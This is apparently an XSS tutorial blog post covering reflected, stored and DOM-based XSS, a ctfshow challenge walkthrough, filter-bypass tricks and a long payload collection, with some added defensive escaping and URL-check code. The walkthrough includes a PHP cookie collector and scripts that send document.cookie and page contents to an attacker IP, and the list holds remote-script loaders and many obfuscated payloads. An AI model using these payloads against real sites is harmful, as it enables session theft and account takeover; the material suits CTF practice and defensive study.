XSS is, at bottom, an advanced form of phishing: the victim's own browser is tricked into running the attacker's script inside a site the victim trusts.

Understanding XSS

XSS stands for Cross-Site Scripting. It is abbreviated XSS rather than CSS to avoid confusion with Cascading Style Sheets.

XSS is a security vulnerability that shows up constantly in web applications: it lets a malicious user plant code into pages that are served to other users.

An XSS attack generally involves three parties: the attacker, the target server, and the victim's browser.

Principle: malicious script is injected into the HTML, CSS or JavaScript that the victim's browser loads, and it runs in the origin of the vulnerable site, with that site's cookies and DOM.

Reflected XSS

Reflected XSS is also called non-persistent XSS.
It is called reflected because the injected code is "reflected" back from the target server in an error message, a search result or similar: the XSS code sits in the URL of the request, is submitted as input to the server, the server processes it and includes it in the response, the response carries the code back to the browser, and the browser parses and executes it. The round trip looks like a reflection, hence the name.
It is called non-persistent because the attack is one-shot: the code is injected into a dynamically generated page rather than stored in a permanent one, so it only fires when a victim follows the crafted link.

Characteristics:
① No server-side storage is involved; a single HTTP GET or POST request carries the whole attack and can expose the user's private data;
② the attacker has to trick the victim into clicking the link;
③ the hit rate is low, so these bugs are harder to notice, triage and fix;
④ the usual goal is stealing the user's sensitive information (session cookies, tokens).

Stored XSS

Stored XSS is also called persistent XSS.
The biggest difference from reflected XSS is that the attack script is stored permanently on the target server (database, memory, file system, ...), so later requests for the target page trigger it without the XSS code being submitted again.
It typically lives in form-submission features such as posting, commenting or submitting text, and is most common on forums. The attacker submits the payload through a normal feature so that it is persisted in the database; when the front end renders what the back end reads out of the database, the injected code is rendered and executed.
Characteristics:
① persistent, planted in the database;
② wide blast radius: every visitor to the page is hit, and their browsers can even be turned into bots for a DDoS attack;
③ steals users' sensitive private information.

DOM-based XSS

DOM-based XSS is a vulnerability in the client-side handling of the Document Object Model (DOM). The page's own JavaScript reads attacker-controlled data from a source such as location.hash, document.URL or document.referrer and writes it into a sink such as innerHTML, document.write or eval, so the payload is rendered into the page by the page's own script; the payload itself can be any of the usual tag-based vectors (img, input, and so on).
DOM-based XSS is triggered entirely on the front end. The payload need not appear in the server's response at all (a fragment after # is never sent to the server), so server-side filters and logs do not see it.
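The source-to-sink pattern above, as an added example that is not code from the original post. The two render functions return the HTML a page would assign to innerHTML, with location.hash modelled by the hash argument, so the block runs without a browser; the page layout and the "Results for" wording are assumptions.

```javascript
// Vulnerable: untrusted data from the URL fragment (a DOM source) is
// concatenated into markup and handed to a DOM sink.
// In a real page:  document.getElementById("out").innerHTML = renderResultsVulnerable(location.hash)
function renderResultsVulnerable(hash) {
  const term = decodeURIComponent(hash.replace(/^#/, ""));
  return "<p>Results for: " + term + "</p>";
}

// Escape for HTML text and quoted-attribute context. Every character that
// can open a tag, close an attribute or end a template literal is encoded.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;", "`": "&#x60;" };
  return s.replace(/[&<>"'`]/g, c => map[c]);
}

// Hardened: same data, escaped before it reaches the sink. Better still is
// to avoid the HTML sink entirely:  out.textContent = term
function renderResultsSafe(hash) {
  const term = decodeURIComponent(hash.replace(/^#/, ""));
  return "<p>Results for: " + escapeHtml(term) + "</p>";
}

// Rough stand-in for "would the browser execute anything here?": true if the
// string contains a <script> start tag or any start tag carrying an on* handler.
function containsActiveMarkup(html) {
  return /<\s*script\b|<\w+[^>]*\son\w+\s*=/i.test(html);
}

// Constructed sample: the img/onerror vector from the bypass section,
// delivered in the fragment so the server never sees it.
const SAMPLE_HASH = "#<img src=x onerror=alert(1)>";
console.log(renderResultsVulnerable(SAMPLE_HASH));  // the img tag survives, onerror fires
console.log(renderResultsSafe(SAMPLE_HASH));        // rendered as literal text
```

Note that escaping is context-specific: escapeHtml is right for text nodes and quoted attributes, but data placed inside a URL, a script block or a style block needs the encoding for that context.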

Worked example: ctfshow web入门 316


Whatever is submitted is echoed back unchanged, so try executing JavaScript: <script>alert(1)</script>

The alert box pops, so the input is rendered as HTML.

The flag for this challenge is in the admin's cookie; a bot periodically visits the generated link automatically.

Create a collector script a.php on a VPS. Note that it reads the parameter named cookie, while the links below send the data as parameter 1; rename one of them, or simply read the web server's access log.

<?php
// Collector: append whatever arrives in ?cookie= to cookie.txt, one entry per line.
// No validation on purpose; this runs on the attacker's own host.
$cookie = $_GET['cookie'] ?? '';
$log = fopen("cookie.txt", "a");
fwrite($log, $cookie . "\n");
fclose($log);
?>

Generate the XSS link used to fetch the admin's cookie (replace ip:port with the collector):

<body/**/onload="window.open('http://ip:port/index.php/?1='+document.cookie)"></body>

<body/**/onload="window.location.href='http://ip:port/index.php/?1='+document.cookie"></body>

<script>window.open("http://149.88.83.236:8000/a.php/?1="+document.cookie)</script>

Running python3 -m http.server on the VPS is enough: the GET request, cookie and all, shows up in its access log, so the PHP collector is optional. window.open is blocked by pop-up blockers in a normal browser (the challenge bot still executes it); setting window.location.href, or loading the collector URL as an image, needs no user gesture.

<script>window.open('http://149.88.83.236:8000/a.php'+document.getElementsByClassName('layui-table-cell laytable-cell-1-0-1')[1].innerHTML)</script>
Fragment by fragment:
window.open(url): opens a URL in a new window (in effect, sends a GET request)
'http://149.88.83.236:8000/a.php': the attacker's own server, used to collect data
document.getElementsByClassName(...)[1]: the second element whose class is layui-table-cell laytable-cell-1-0-1
.innerHTML: that element's HTML content, which may be the flag or other sensitive data
concatenation into a full URL: the sensitive content is appended to the URL and sent back to the attacker. This variant has no ?1= separator, so the data lands in the request path rather than a query parameter; it still shows up in the access log, but a.php would not see it in $_GET.
<script>$('.layui-table-cell').each(function(index,value){{if(value.innerHTML.indexOf('ctfshow') > -1){window.open("http://149.88.83.236:8000/a.php/?1="+value.innerHTML);}}})</script>
  • iterate over every .layui-table-cell element (this relies on the target page already loading jQuery)
  • check whether its innerHTML contains 'ctfshow' (the flag prefix)
  • on a match, call window.open() with the cell's content appended, carrying the flag out

Bypasses

The standard probe is <script>alert(1)</script>.

Next, img, body and input tags can be used instead of script.

For an IMG tag, onload fires when the given image URL exists and the image finishes loading; onerror fires when the URL does not exist or the network request fails. The latter is why src=x onerror=... is the go-to vector: it needs no user interaction and no valid image.

  1. If ( ) are filtered, call the function with a template literal instead, e.g. alert`1`.
  2. If spaces are filtered, /**/ (or a bare /) can separate attributes, because the HTML tokenizer accepts / between attributes.
  3. If < > are filtered, the URL-encoded forms %3c %3e can be tried; this only works when the filter inspects the raw request and the server decodes it before reflecting.
  4. Likewise quotes can be replaced with %27 %22 under the same condition.

Payload collection

# Category 1: JavaScript URLs (the vbscript: entries only work in old Internet Explorer)
<a href="javascript:alert('test')">link</a>
<a href="javascript:alert('xss')">link</a>
<a href='vbscript:MsgBox("XSS")'>link</a>
<a href="vbscript:alert(1)">Hello</a>
<a href="vbscript:alert(1)">Hello</a>
<a href=javascript:alert("XSS")>link</a>
<a href=`javascript:alert("RSnake says,'XSS'")`>link</a>
<a href=javascript:alert(String.fromCharCode(88,83,83))>link</a>
<a href="javascript&colon;alert(1)">link</a>
<a href="javaSCRIPT&colon;alert(1)">Hello</a>
<a href="javasc&NewLine;ript&colon;alert(1)">link</a>
<a href="javas&Tab;cript:\u0061lert(1);">Hello</a>
<a href="jav ascript:alert('XSS')">link</a>
<a href="jav&#x09;ascript:alert('XSS')">link</a>
<a href="jav&#x0D;ascript:alert('XSS')">link</a>
<a href="  javascript:alert('XSS');">link</a>
<a href="javascript:\u0061lert&#x28;1&#x29">Hello</a>
<a href="javascript:confirm`1`">link</a>
<a href="javascript:confirm(1)">link</a>
<a href="j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1)">1</a>
<a href="javascript:%61%6c%65%72%74%28%31%29">link</a>
<a href="javascript:\u0061\u006C\u0065\u0072\u0074(1)">link</a>
<a href=javascript:eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")>2</a>
<a href=javascript:eval("alert('xss')")>link</a>
<a href=javascript:alert('XSS')>link</a>
<a href=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>link</a>
<a href=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>link</a>
<a href="data:text/html;base64,amF2YXNjcmlwdDphbGVydCgxKQ==">test</a>
<a href=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+>1</a>
<iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
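Why a naive "does it start with javascript:" check is defeated by most of the entries above, and a check that normalises the way a browser does before deciding. This is an added example, not part of the original payload list; the allow-list of schemes and the named-entity table are assumptions chosen to cover the payloads in this category.

```javascript
// Named entities the payloads above rely on; numeric references are handled
// generically. Only own properties are consulted (no prototype lookups).
const NAMED = { colon: ":", Tab: "\t", NewLine: "\n", sol: "/", lt: "<", gt: ">", amp: "&", quot: '"' };

function cpToStr(cp) {
  return cp <= 0x10ffff ? String.fromCodePoint(cp) : "";
}

// Decode &#106; &#x6A; (semicolon optional, leading zeros allowed) and the
// named entities above. Deliberately over-decodes (e.g. double-encoded
// forms) because for a reject-or-allow check that is the fail-closed direction.
function decodeEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => cpToStr(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => cpToStr(parseInt(d, 10)))
    .replace(/&([a-z]+);/gi, (m, n) => (Object.prototype.hasOwnProperty.call(NAMED, n) ? NAMED[n] : m));
}

// Browsers strip leading/trailing C0 controls and spaces and remove tab, CR
// and LF anywhere before reading the scheme. Stripping every control/space
// anywhere is stricter than that, which is fine for a sanitizer.
function normalizeForSchemeCheck(raw) {
  return decodeEntities(raw).replace(/[\x00-\x20]/g, "").toLowerCase();
}

// The check many filters actually implement.
function naiveIsSafe(raw) {
  return !raw.toLowerCase().startsWith("javascript:");
}

// Allow-list the scheme instead of block-listing "javascript:". URLs with
// no scheme are relative and allowed.
const ALLOWED_SCHEMES = ["http", "https", "mailto"];
function isSafeUrl(raw) {
  const u = normalizeForSchemeCheck(raw);
  const m = /^([a-z][a-z0-9+.-]*):/.exec(u);
  if (!m) return true;
  return ALLOWED_SCHEMES.includes(m[1]);
}

// Constructed samples taken from the list above.
const SAMPLES = [
  "javascript&colon;alert(1)",
  "jav&#x09;ascript:alert('XSS')",
  "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058alert(1)",
  "https://example.com/page",
];
for (const s of SAMPLES) {
  console.log(JSON.stringify(s), "naive:", naiveIsSafe(s), "normalised:", isSafeUrl(s));
}
```

The same normalisation matters for an img src, an iframe src or a form action; what differs per sink is only the allow-list.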

# Category 2: CSS @import (loading javascript: through @import only works in old Internet Explorer)
<style>@import url("http://attacker.org/malicious.css");</style>
<style>@imp\ort url("http://attacker.org/malicious.css");</style>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<STYLE>@import'http://jb51.net/xss.css';</STYLE>
# Category 3: Inline style (CSS expression() and url(javascript:) inside styles are IE-only; modern browsers ignore them)

<div style="color: expression(alert('XSS'))">
<div style=color:expression\(alert(1))></div>
<div style="color: '<'; color: expression(alert('XSS'))">
<div style=X:expression(alert(/xss/))>
<div style="x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))">
<div style="x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))">
<div style="x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<div style="z:exp/*anything*/res/*here*/sion(alert(1))">
<div style=xss:expr/*XSS*/ession(alert('XSS'))>
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
</XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.baidu.com")>
<img STYLE="background-image:url(javascript:alert('XSS'))"> //ie6
<img STYLE="background-image:\75\72\6c\28\6a\61\76\61\73\63\72\69\70\74\3a\61\6c\65\72\74\28\27\58\53\53\27\29\29">
<A STYLE='no\xss:noxss("*//*");xss:ex&#x2F;*XSS*//*/*/pression(alert("XSS"))'>

# Category 4: JavaScript event handlers (onactivate, onbeforeeditfocus, onfilterchange, onhelp, onlosecapture and the behavior:url('#default#time2') timeline events are IE-only)
<div onclick="alert('xss')">
<div onmouseenter="alert('xss')">
<div onclick ="alert('xss')">
<BODY ONLOAD=alert('XSS')>
<img src=1 onerror=alert(1)>
<img/src='1'/onerror=alert(0)>
<img src="1" onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;" />
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>
<img src=1 onmouseover=alert('xss') a1=1111>
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='http://t.cn/R5UpyOt';>
<a href="#" onclick=alert('\170\163\163')>test</a>
<a href="#" onclick="\u0061\u006C\u0065\u0072\u0074(1)">link</a>
<a href="#" onclick="\u0061\u006C\u0065\u0072\u0074`a`">link</a>
<a href="#" onclick="alert('xss')">link</a>
<marquee onscroll=alert(1)> test</marquee>
<div style="width:100px;height:100px;overflow:scroll" onscroll="alert('a')">123456 <br/><br/><br/><br/><br/></div>
<DIV onmousewheel="alert('a')" >123456</DIV><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/>
<div style="background-color:red" onmouseenter="alert('a')">123456</div>
<DIV onmouseleave="alert('1')">123456</DIV>
<div contentEditable="true" style="background-color:red" onfocusin="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red" onfocusout="alert('bem')" >asdf</div>
<marquee onstart="alert('a')" >asdf</marquee>
<div style="background-color:red;" onbeforecopy="alert('a')" >asdf</div>
<div style="background-color:red;" onbeforecut="alert('a')" >asdf</div>
<div style="background-color:red;" contentEditable="true" onbeforeeditfocus="alert('a')" >asdf</div>
<div style="background-color:red;" contentEditable="true" onbeforepaste="alert('a')" >asdf</div>
<div style="background-color:red;" oncontextmenu="alert('a')" >asdf</div>
<div style="background-color:red;" oncopy="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red;" oncut="alert('a')" >asdf</div>
<div style="background-color:red;" ondrag="alert('1')" >asdf</div>
<div style="background-color:red;" ondragend="alert('a')" >asdf</div>
<div style="background-color:red;" ondragenter="alert('b')" >asdf</div>
<div contentEditable="true" style="background-color:red;" ondragleave="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red;" ondragover="alert('b')" >asdf</div>
<div contentEditable="true" style="background-color:red;" ondragstart="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red;" ondrop="alert('b')" >asdf</div> <div contentEditable="true" style="background-color:green;" ondrop="alert('bem')" >asdf</div>
<div contentEditable="true" style="background-color:red;" onlosecapture="alert('b')">asdf</div>
<div contentEditable="true" style="background-color:red;" onpaste="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red;" onselectstart="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red;" onhelp="alert('a')" >asdf</div>
<div STYLE="background-color:red;behavior:url('#default#time2')" onEnd="alert('a')">asdf</div>
<div STYLE="background-color:red;behavior:url('#default#time2')" onBegin="alert('a')">asdf</div>
<div contentEditable="true" STYLE="background-color:red;" onactivate="alert('b')">asdf</div>
<div contentEditable="true" STYLE="background-color:red;filter: Alpha(opacity=100, style=2);"onfilterchange="alert('b')">asdf</div>
<div contentEditable="true" onbeforeactivate="alert('b')">asdf</div>
<div contentEditable="true" onbeforedeactivate="alert('a')">asdf</div>
<div contentEditable="true" ondeactivate="alert('bem')">asdf</div>
<video src="http://www.w3schools.com/html5/movie.ogg" onloadedmetadata="alert(1)" />
<video src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)" />
<audio src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)">
<audio src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)"></audio>
<body onscroll=alert(26)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<input type="hidden" accesskey="X" onclick="alert(/xss/)">


# Category 5: Script tags
<script src="http://baidu.com"></script><script>Function(atob('YWxlcnQoInhzcyIp'))()</script>
<script>alert("XSS")</script>
<scr<script>ipt>alert("XSS")</scr<script>ipt>
<SCRIPT>a=/XSS/;alert(a.source)</SCRIPT>
<script>alert(/1/.source)</script>
<script>alert(1);</script>
<script>prompt(1);</script>
<script>confirm(1);</script>
<script>alert(/88199/)</script>
<script>alert(`a`)</script>
<script>alert('a')</script>
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<script>eval(alert(1))</script>
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 50, 51, 41))</script>
<script>eval("\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029")</script>
<script>eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')</script>
<script>setTimeout('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')</script>
<script>setTimeout(alert(1),0)</script>
<script>setTimeout`alert\x28\x27 xss \x27\x29`</script>
<script>setInterval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')</script>

<script src=data:text/javascript,alert(1)></script>
<script src=&#100&#97&#116&#97:text/javascript,alert(1)></script>

<script>\u0061\u006C\u0065\u0072\u0074(123)</script>
<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
<script>\u0061\u006C\u0065\u0072\u0074`a`</script>
<script>window['alert'](0)</script>
<script>parent['alert'](1)</script>
<script>self['alert'](2)</script>
<script>top['alert'](3)</script>
<!--[if]><script>alert(1)</script -->

<script>alert("xss");;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;</script>
<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>
<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+
[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>
1. onmouseenter: runs when the mouse enters the element
<div style="background-color:red" onmouseenter="alert('bem')">123456</div>

2. onmouseleave: runs when the mouse leaves the element
<DIV onmouseleave="alert('bem')">123456</DIV>

3. onmousewheel: runs when the wheel is scrolled over the element
<DIV onmousewheel="alert('bem')">123456</DIV>

4. onscroll: runs when the scrollbar is dragged
<div style="width:100px;height:100px;overflow:scroll" onscroll="alert('bem')">123456
</div>

5. onfocusin: runs when the element gains focus
<div contentEditable="true" onfocusin="alert('bem')">asdf</div>

6. onfocusout: runs when the element loses focus
<div contentEditable="true" onfocusout="alert('bem')">asdf</div>

7. onstart: runs when the marquee starts displaying its content (IE only)
<marquee style="background-color:red" onstart="alert('bem')" >asdf</marquee>

8. onbeforecopy: runs just before a copy (select text, then right-click or Ctrl+C)
<div style="" onbeforecopy="alert('bem')" >asdf</div>

9. onbeforecut: runs just before a cut
<div style="" onbeforecut="alert('bem')" >asdf</div>

10. onbeforeeditfocus: runs when an editable element is about to receive focus (IE only)
<div style="" contentEditable="true" onbeforeeditfocus="alert('bem')" >asdf</div>

11. onbeforepaste: runs just before a paste
<div style="" contentEditable="true" onbeforepaste="alert('bem')" >asdf</div>

12. oncontextmenu: runs on right-click
<div style="" oncontextmenu="alert('bem')" >asdf</div>

13. oncopy: runs when the content is copied
<div style="" oncopy="alert('bem')" >asdf</div>

14. oncut: runs when the content is cut
<div contentEditable="true" style="" oncut="alert('bem')" >asdf</div>

15. ondrag: runs while selected content is being dragged
<div style="" ondrag="alert('bem')" >asdf</div>

16. ondragend: runs when the mouse is released after dragging
<div style="" ondragend="alert('bem')" >asdf</div>

17. ondragenter: runs when a drag enters the element
<div style="" ondragenter="alert('bem')" >asdf</div>

18. ondragleave: runs when a drag leaves the element's border
<div contentEditable="true" style="" ondragleave="alert('bem')" >asdf</div>

19. ondragover: runs while a drag is over the element
<div contentEditable="true" style="" ondragover="alert('bem')" >asdf</div>

20. ondragstart: runs when a drag of selected content starts
<div contentEditable="true" style="" ondragstart="alert('bem')" >asdf</div>

21. ondrop: runs when content is dropped into the element
<div contentEditable="true" style="" ondrop="alert('bem')" >asdf</div>

22. onlosecapture: runs when the element loses mouse capture (IE only)
<div contentEditable="true" style="" onlosecapture="alert('bem')" >asdf</div>

23. onpaste: runs on paste
<div contentEditable="true" style="" onpaste="alert('bem')" >asdf</div>

24. onselectstart: runs when a selection starts
<div contentEditable="true" style="" onselectstart="alert('bem')" >asdf</div>

25. onhelp: runs when F1 is pressed while the element has focus (IE only)
<div contentEditable="true" style="" onhelp="alert('bem')" >asdf</div>

26. onEnd: runs when the timeline finishes (IE HTML+TIME behavior only)
<div STYLE="behavior:url('#default#time2')" onEnd="alert('bem')">asdf</div>

27. onBegin: runs when the timeline starts (IE HTML+TIME behavior only)
<div STYLE="behavior:url('#default#time2')" onBegin="alert('bem')">asdf</div>

28. onactivate: runs when the element becomes the active element (IE only)
<div contentEditable="true" STYLE="" onactivate="alert('bem')">asdf</div>

29. onfilterchange: runs when a visual filter changes (IE only)
<div contentEditable="true" STYLE="filter: Alpha(opacity=100, style=2);" onfilterchange="alert('bem')">asdf</div>

30. onbeforeactivate: runs just before the element becomes the active element (IE only)
<div contentEditable="true" STYLE="" onbeforeactivate="alert('bem')">asdf</div>

31. onbeforedeactivate: runs just before the active element changes away from this element (IE only)
<div contentEditable="true" STYLE="" onbeforedeactivate="alert('bem')">asdf</div>

32. ondeactivate: runs when the active element changes away from this element (IE only)
<div contentEditable="true" STYLE="" ondeactivate="alert('bem')">asdf</div>

<a> tag
<a href=javascript:alert(1)>111</a>

<img> tag
<img src=https://www.baidu.com/img/flexible/logo/pc/result.png>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>

<input> tag
<input onmouseover=alert(1) />

<script> tag
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>

If alert is filtered, prompt, confirm or console.log can be substituted.
If all of those are filtered, take another route. For example 11189117..toString(32) evaluates to the string "alert": Number.prototype.toString(32) uses the digits 0-9 followed by a-v, and parseInt("alert", 32) is 11189117. The double dot is required because 11189117. is a number literal with a trailing dot and the second dot is the property access; top["alert"](2222) then calls alert without the word ever appearing in the payload. The same trick works for any name made only of the characters 0-9 and a-v (prompt, confirm, eval, location, cookie), but not for names containing w-z or uppercase letters.

onmouseover=top[11189117..toString(32)](2222)
onmouseover="setTimeout(String.fromCharCode(97,108,101,114,116,40,49,41))"
onmousemove=top[11189117..toString(32)](2222)
onclick=... and so on for any other handler
onmousemove='alert(1111)'a="
<script>top[11189117..toString(32)](2222)</script>
<ScRiPt>top[11189117..toString(32)](2222)</ScRiPt>
%3cscript%3ealert(1111)%3c/script%3e
<Script>\u0061\u006C\u0065\u0072\u0074(1111)</Script>

<img src=java\0script:alert`1111`>
<img src=x onerror=alert`1111`>
